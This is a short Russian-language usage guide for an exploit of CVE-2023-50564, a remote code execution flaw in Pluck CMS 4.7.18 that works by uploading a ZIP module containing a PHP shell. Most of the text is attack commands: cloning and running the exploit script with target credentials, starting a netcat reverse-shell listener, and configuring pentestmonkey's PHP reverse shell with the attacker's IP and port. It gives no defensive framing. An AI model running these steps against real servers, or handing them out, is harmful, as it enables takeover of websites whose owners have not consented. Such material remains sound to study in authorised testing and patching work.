
Pluck v4.7.18 - Удаленное выполнение кода (RCE)
Эта эксплойт позволяет аутентифицированному администратору Pluck CMS v4.7.18 загрузить вредоносный ZIP-модуль, содержащий PHP-шелл, что приводит к удаленному выполнению кода (RCE).
installmodulegit clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt
python3 exploit.py -h
python3 exploit.py -t <цель> -u <имя_пользователя> -pass <пароль> -path <путь_к_php_shell> [-p <порт>]
Сначала на машине атакующего следует запустить слушатель реверс-шелла (эту вкладку терминала не следует закрывать):
nc -nvlp <укажите_порт>
Затем загрузите PHP-реверс-шелл с https://github.com/pentestmonkey/php-reverse-shell и настройте его под машину атакующего (IP, порт).
Запустите код эксплойта на другой вкладке:
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php